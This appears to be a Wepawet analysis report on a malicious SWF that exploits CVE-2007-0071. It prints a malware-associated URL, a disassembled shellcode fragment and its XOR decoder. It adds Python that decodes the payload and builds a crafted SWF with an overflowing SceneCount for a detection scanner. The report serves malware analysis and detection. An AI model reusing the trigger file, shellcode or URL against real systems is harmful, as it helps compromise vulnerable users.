Analysis report for 0d4f7aef9e740091bd5a20c52f7b7ad6.swf

WARNING: This SWF contains a suspicious Scene Count value (the SceneCount field of the DefineSceneAndFrameLabelData tag) that can cause an integer overflow in older Adobe Flash Players, which lets the SWF file execute malicious code without the user's knowledge. See http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0071 for more information.
NOTE: This SWF file contains ActionScript 3.0 code. Execution of AS3 code is not currently supported by Wepawet.
  1. Summary
    1. Result: MALICIOUS
      • CVE-2007-0071 exploit detected.
      • Detected URLs are associated with malware.
      • Shellcode was detected.

  2. Details
    Hash: 0d4f7aef9e740091bd5a20c52f7b7ad6
    Submitted On: 2008-12-28 16:02:57
    Processing Start: 2009-06-04 02:22:47
    Processing End: 2009-06-04 02:26:11
    SWF Version: 6

    Virustotal Report (malicious)

  4. Referenced URLs

    1. http://qq.18i16.net/exe1/b04.css
       Discovery Method | Offset | Extra
       Static           | 0x3b3  | Anubis; Virustotal; Domain Associated with Malware!

  5. Shellcode
    1. Shellcode detected starting at file offset 0x10b (the call to 0xf5 that pushes the payload address 0x110 for the decoder). The listing below starts earlier, at 0xd3, for context and is out of sync until the pop ebx at 0xf5. The bytes from 0x110 onward are XOR-encoded data that the loop at 0xf6-0x109 decodes in place, so the instructions printed after 0x110 are not real code.
      000000D3  B4F7              mov ah,0xf7
      000000D5  209F9EB0ED4A      and [edi+0x4aedb09e],bl
      000000DB  7203              jc 0xe0
      000000DD  A5                movsd
      000000DE  C0AD99ABF6C940    shr byte [ebp-0x36095467],0x40
      000000E5  2BF2              sub esi,edx
      000000E7  EAACDFB0B94052    jmp dword 0x5240:0xb9b0dfac
      000000EE  D1                db 0xD1
      000000EF  759E              jnz 0x8f
      000000F1  2960EB            sub [eax-0x15],esp
      000000F4  16                push ss
      000000F5  5B                pop ebx
      000000F6  33D2              xor edx,edx
      000000F8  66B889A7          mov ax,0xa789
      000000FC  66310453          xor [ebx+edx*2],ax
      00000100  42                inc edx
      00000101  40                inc eax
      00000102  6681FA5101        cmp dx,0x151
      00000107  7CF3              jl 0xfc
      00000109  EB05              jmp short 0x110
      0000010B  E8E5FFFFFF        call 0xf5
      00000110  60                pushad
      00000111  C288A7            ret 0xa788
      00000114  8BF8              mov edi,eax
      00000116  E697              out 0x97,al
      00000118  D4C3              aam 0xc3
      0000011A  05A6043F38        add eax,0x383f04a6
      0000011F  A7                cmpsd
      00000120  91                xchg eax,ecx
      00000121  A7                cmpsd
      00000122  19E7              sbb edi,esp
      00000124  9F                lahf
      00000125  2CE4              sub al,0xe4
      00000127  BB382CFEAF        mov ebx,0xaffe2c38
      0000012C  1C50              sbb al,0x50
      0000012E  194B99            sbb [ebx-0x67],ecx
      00000131  A5                movsd
      00000132  9AA71E7CE9A05A    call dword 0x5aa0:0xe97c1ea7
      00000139  E1BA              loope 0xf5
      0000013B  6E                outsb

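The decoder loop in the listing (pop ebx at 0xf5, then xor edx,edx / mov ax,0xa789 / xor [ebx+edx*2],ax / inc edx / inc eax / cmp dx,0x151 / jl) XORs 0x151 little-endian words starting at 0x110 with a 16-bit key that begins at 0xa789 and increases by one per word. The following is example code written for this page, not Wepawet output: it re-implements that loop, resolves the E8 rel32 call at 0x10b to its real target 0xf5 (the listing's "call dword 0x1000000f5" is the same value printed by a disassembler running in 64-bit mode), and applies the loop to the 44 encoded bytes transcribed from 0x110-0x13b. The first words come out as E9 65 02 00 00 (jmp forward 0x265) followed by 5F 6A 30 59 64 8B 01 (pop edi; push 0x30; pop ecx; mov eax,fs:[ecx]), the usual PEB fetch, which confirms the reading of the loop. The rest of the 674-byte payload is not on this page, and the round-trip sample is constructed.

```python
"""Re-implementation of the shellcode's rolling XOR decoder (example code
written for this page, not Wepawet output). ENCODED_PREFIX is transcribed
from the listing at 0x110-0x13b; every other buffer is constructed."""
import struct

KEY_START = 0xA789      # mov ax,0xa789
WORD_COUNT = 0x151      # cmp dx,0x151  -> 0x151 words = 674 bytes
CALL_OFFSET = 0x10B     # E8 E5 FF FF FF, the call that pushes 0x110

# Bytes 0x110-0x13b as printed in the listing (first 44 of the encoded
# payload); the disassembler rendered them as junk instructions.
ENCODED_PREFIX = bytes.fromhex(
    "60c288a78bf8e697d4c305a6043f38a791a719e79f2ce4bb382cfeaf"
    "1c50194b99a59aa71e7ce9a05ae1ba6e"
)


def call_target(buf, off):
    """Resolve a 5-byte E8 rel32 call at buf[off] to its 32-bit target
    (next instruction address + signed displacement, truncated to 32 bits)."""
    if buf[off] != 0xE8:
        raise ValueError("no E8 call at offset 0x%x" % off)
    (rel,) = struct.unpack_from("<i", buf, off + 1)
    return (off + 5 + rel) & 0xFFFFFFFF


def xor_rolling_u16(data, key=KEY_START, words=WORD_COUNT):
    """Word i (little-endian u16) ^= (key + i) & 0xffff for i < words,
    exactly what xor [ebx+edx*2],ax / inc edx / inc eax does.
    XOR is an involution, so the same call encodes and decodes."""
    out = bytearray(data)
    for i in range(min(words, len(out) // 2)):
        k = (key + i) & 0xFFFF
        (w,) = struct.unpack_from("<H", out, 2 * i)
        struct.pack_into("<H", out, 2 * i, w ^ k)
    return bytes(out)


def decode_listing_prefix():
    """Decode the transcribed 44 bytes; the first 12 decoded bytes are
    e9 65 02 00 00 5f 6a 30 59 64 8b 01."""
    return xor_rolling_u16(ENCODED_PREFIX)


def getpc_offset_from_listing():
    """Check that the flagged call at 0x10b lands on the decoder at 0xf5.
    Constructed buffer: only the five call bytes are taken from the listing."""
    buf = bytearray(0x110)
    buf[CALL_OFFSET:CALL_OFFSET + 5] = bytes.fromhex("e8e5ffffff")
    return call_target(buf, CALL_OFFSET)


if __name__ == "__main__":
    print("call at 0x%x -> 0x%x" % (CALL_OFFSET, getpc_offset_from_listing()))
    print(decode_listing_prefix().hex())
```

To decode the full payload from the original file, read 674 bytes at file offset 0x110 and pass them to xor_rolling_u16 with the defaults; the loop counter is 16-bit (cmp dx), so a payload longer than 0xffff words would need the loop bound re-derived.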
  6. Obfuscation Techniques
    1. Invalid tags
      1. Tag Type 255 at file byte offset 27
      2. Tag Type 157 at file byte offset 1544
      3. Tag Type 157 at file byte offset 1585
      4. Tag Type 157 at file byte offset 1626
      5. Tag Type 133 at file byte offset 1667
      6. Tag Type 133 at file byte offset 1702
      7. Tag Type 133 at file byte offset 1737
      8. Tag Type 133 at file byte offset 1772
      9. Tag Type 181 at file byte offset 1807
      10. Tag Type 181 at file byte offset 1842
      11. Tag Type 181 at file byte offset 1889
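The invalid-tag finding above comes from walking the SWF tag list: each tag starts with a 16-bit RECORDHEADER whose upper 10 bits are the tag code and lower 6 bits the length (0x3f meaning a 32-bit length follows), and the SWF specification defines no tag codes 133, 157, 181 or 255. The same walk is where a scanner can catch the CVE-2007-0071 trigger by reading the SceneCount of a DefineSceneAndFrameLabelData tag (code 86) before the player multiplies it into an allocation size. The example below is written for this page and is not Wepawet's own checker: it parses FWS and CWS headers, flags undocumented tag codes, and flags a scene count that is either implausibly large (the 0x10000 limit is an assumption) or appears in a file older than SWF 9, the version that introduced that tag. The sample SWF it runs on is constructed in the code.

```python
"""Walk an SWF tag list and flag undocumented tag codes and a suspicious
DefineSceneAndFrameLabelData SceneCount (CVE-2007-0071). Example code
written for this page, not Wepawet's checker; sample file is constructed."""
import struct
import zlib

# Tag codes defined in the SWF file format specification. 133, 157, 181 and
# 255 from the report above are not among them.
KNOWN_TAGS = frozenset([
    0, 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 17, 18, 19, 20, 21,
    22, 23, 24, 26, 28, 32, 33, 34, 35, 36, 37, 39, 43, 45, 46, 48, 56, 57,
    58, 59, 60, 61, 62, 64, 65, 66, 69, 70, 71, 73, 74, 75, 76, 77, 78, 82,
    83, 84, 86, 87, 88, 89, 90, 91, 93,
])
DEFINE_SCENE_AND_FRAME_LABEL_DATA = 86   # introduced in SWF 9
SCENE_COUNT_LIMIT = 0x10000              # assumption: no real file needs more


def encoded_u32(buf, pos):
    """SWF EncodedU32: 7 data bits per byte, high bit = more, at most 5 bytes."""
    value, shift = 0, 0
    for _ in range(5):
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            break
        shift += 7
    return value & 0xFFFFFFFF, pos


def swf_header(data):
    """Return (version, stream) with stream starting at the RECT field;
    CWS bodies are zlib-inflated first."""
    sig, version = data[:3], data[3]
    if sig == b"FWS":
        return version, data[8:]
    if sig == b"CWS":
        return version, zlib.decompress(data[8:])
    raise ValueError("not an SWF file: signature %r" % sig)


def analyse_swf(data):
    """Return findings as (kind, offset, detail). Offsets count from the
    start of the uncompressed file (8-byte header included): the file
    offset for FWS, the inflated-stream offset for CWS."""
    version, stream = swf_header(data)
    nbits = stream[0] >> 3                   # RECT: 5-bit Nbits then 4 fields
    pos = (5 + 4 * nbits + 7) // 8 + 2 + 2   # RECT + FrameRate u16 + FrameCount u16
    findings = []
    while pos + 2 <= len(stream):
        hdr_off = pos
        (hdr,) = struct.unpack_from("<H", stream, pos)
        pos += 2
        code, length = hdr >> 6, hdr & 0x3F
        if length == 0x3F:                   # long RECORDHEADER
            (length,) = struct.unpack_from("<I", stream, pos)
            pos += 4
        if pos + length > len(stream):
            findings.append(("truncated_tag", 8 + hdr_off, "tag type %d" % code))
            break
        if code not in KNOWN_TAGS:
            findings.append(("invalid_tag", 8 + hdr_off, "tag type %d" % code))
        elif code == DEFINE_SCENE_AND_FRAME_LABEL_DATA:
            scene_count, _ = encoded_u32(stream, pos)
            if version < 9 or scene_count > SCENE_COUNT_LIMIT:
                findings.append(("suspicious_scene_count", 8 + hdr_off,
                                 "SceneCount=0x%x in SWF v%d" % (scene_count, version)))
        if code == 0:                        # End tag
            break
        pos += length
    return findings


def _tag(code, payload):
    """Encode one tag with a short or long RECORDHEADER."""
    if len(payload) < 0x3F:
        return struct.pack("<H", (code << 6) | len(payload)) + payload
    return struct.pack("<HI", (code << 6) | 0x3F, len(payload)) + payload


def build_sample_swf(compress=False):
    """Constructed SWF v6: SetBackgroundColor, a bogus tag type 255, a
    DefineSceneAndFrameLabelData whose SceneCount is 0xffffffff but holds a
    single scene record (the overflow only needs the count), ShowFrame, End."""
    rect = bytes([0x08, 0x00])                    # Nbits=1, four zero fields
    head = rect + struct.pack("<HH", 0x0C00, 1)   # 12.0 fps, 1 frame
    scene = bytes.fromhex("ffffffff0f")           # SceneCount = 0xffffffff
    scene += b"\x00\x00"                          # Offset 0, empty Name
    scene += b"\x00"                              # FrameLabelCount 0
    body = (head + _tag(9, b"\xff\xff\xff") + _tag(255, b"\x00" * 4)
            + _tag(DEFINE_SCENE_AND_FRAME_LABEL_DATA, scene)
            + _tag(1, b"") + _tag(0, b""))
    hdr = bytes([6]) + struct.pack("<I", 8 + len(body))
    if compress:
        return b"CWS" + hdr + zlib.compress(body)
    return b"FWS" + hdr + body


if __name__ == "__main__":
    for kind, off, detail in analyse_swf(build_sample_swf()):
        print("%-22s offset %d: %s" % (kind, off, detail))
```

The CWS path reports stream offsets rather than file offsets, which is why offsets in a compressed sample cannot be compared directly against a hex dump of the file on disk; inflate first.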